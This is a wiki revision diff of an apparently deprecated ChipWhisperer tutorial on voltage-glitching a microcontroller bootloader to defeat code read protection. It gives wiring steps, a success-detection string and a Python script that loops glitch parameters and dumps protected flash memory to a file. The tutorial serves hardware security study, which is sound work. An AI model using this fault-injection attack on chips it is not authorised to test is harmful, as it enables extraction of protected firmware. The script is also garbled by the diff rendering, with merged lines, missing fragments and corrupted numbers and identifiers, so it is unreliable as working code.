Approved_users, administrator
366
edits
| As of August 2020 the site you are on (wiki.newae.com) is deprecated, and content is now at rtfm.newae.com. |
Changes
→Method 2: Stand Alone Scripting for Stopping Glitch when Success & Dumping Memory
# Connect pin 3 of UEXT (TXD) to pin 10 on the CW-Lite
# Connect pin 4 of UEXT (RXD) to pin 12 on the CW-Lite
# Connect RST (the 3 header pins soldered on) to pins 5 (nRST) and 14 (GPIO3) or 16 (GPIO4) on the CW-Lite
# Finally, attach an SMA cable between the one you added to the board and the GLITCH connector on the CW-Lite. If you'd like instead you can also use a SMA Tee to do both measurement & glitch.
</syntaxhighlight>
=== Using the Glitch Explorer ===
The last thing we need to do before beginning our glitches is to setup the Glitch Explorer to detect successful glitches. Since the bootloader sends back a specific error message when read protect is enabled, we can use that to tell if our glitch was successful or not. For example, you could search the string for "\r\n19\r\n" for a normal response, and search for "\r\n0\r\n for a successful response. Setup your Acquisition Settings to run for a while, and check back for successful glitches. If you're lucky, you'll find some glitches and can start reading flash memory.
=== GUI or Stand-Alone ===
This tutorial is split into two parts - the GUI part (here) and a stand-alone demo. You may find the stand-alone demo more useful and easier to run on your own, and is continued before.
Note that the stand-alone demo improves reliability by running the glitch with a 200 MHz CLKGEN frequency, giving you double the width and offset precision. In our testing that worked on a wider range of devices with the ChipWhisperer.
== Method 2: Stand Alone Scripting for Stopping Glitch when Success & Dumping Memory ==
For use without the CW GUI
"""
from __future__ import print_function
import sys
import numpy as np
import chipwhisperer as cw
from tqdm import trange
logging.basicConfig(level=logging.NOTSET)
scope = cw.scope()
#wait for full response, since we need to make sure we don't throw off baud calc
self.read_line(0)
self.serial.write("Synchronized\r\n")
self.read_line(10)
#about these unexpected returns
if "19" not in s:
print ( "Unexpected error code " + s)
return False
def dump_flash(self, start_addr = 0, length = 0x8000, rd_len = 24):
if start_addr % 4:
print ("Address not 4 byte aligned!")
return -1
if length % 4:
print ("Length not 4 byte aligned!")
return -1
bin_file = open("bin_flash.bin", "wb")
print ("Doing loop") for i in rangetrange(start_addr, start_addr + length - 1, rd_len):
self.serial.write("R {:d} {:d}\r\n".format(i, rd_len))
err = self.read_line()
if "13" in err:
#addr err
print ("addr error: addr = {:d}".format(i))
return -1
flash = self.read_line(0)
if flash: data_len = ord(flash[0]) - 32 if rd_len != data_len: print ("Unexpected data_len {:x}, expected {:x}".format(data_len, rd_len)) print ("Actual flash: " + flash)
Range = namedtuple("Range", ["min", "max", "step"])
offset_range = Range(5180*freq_multiplier, 51835185*freq_multiplier, 1)repeat_range = Range(98*freq_multiplier, 1315*freq_multiplier, 1)
scope.glitch.repeat = repeat_range.min
print ("Entering glitch loop")
# it may take quite a few cycles to get a glitch, so just attempt until we get it
s = glitcher.get_read_string()
print ( "Read string: " + s) print ( "Offset = {:04d}, Repeat = {:02d}".format(scope.glitch.ext_offset, scope.glitch.repeat))
if glitcher.check_err_rtn(s):
print ("Success!")
glitcher.dump_flash()
cleanup_exit()
scope.glitch.repeat += repeat_range.step
def cleanup_exit():
scope.dis()
target.dis()
exit()
cleanup_exit()
</syntaxhighlight>
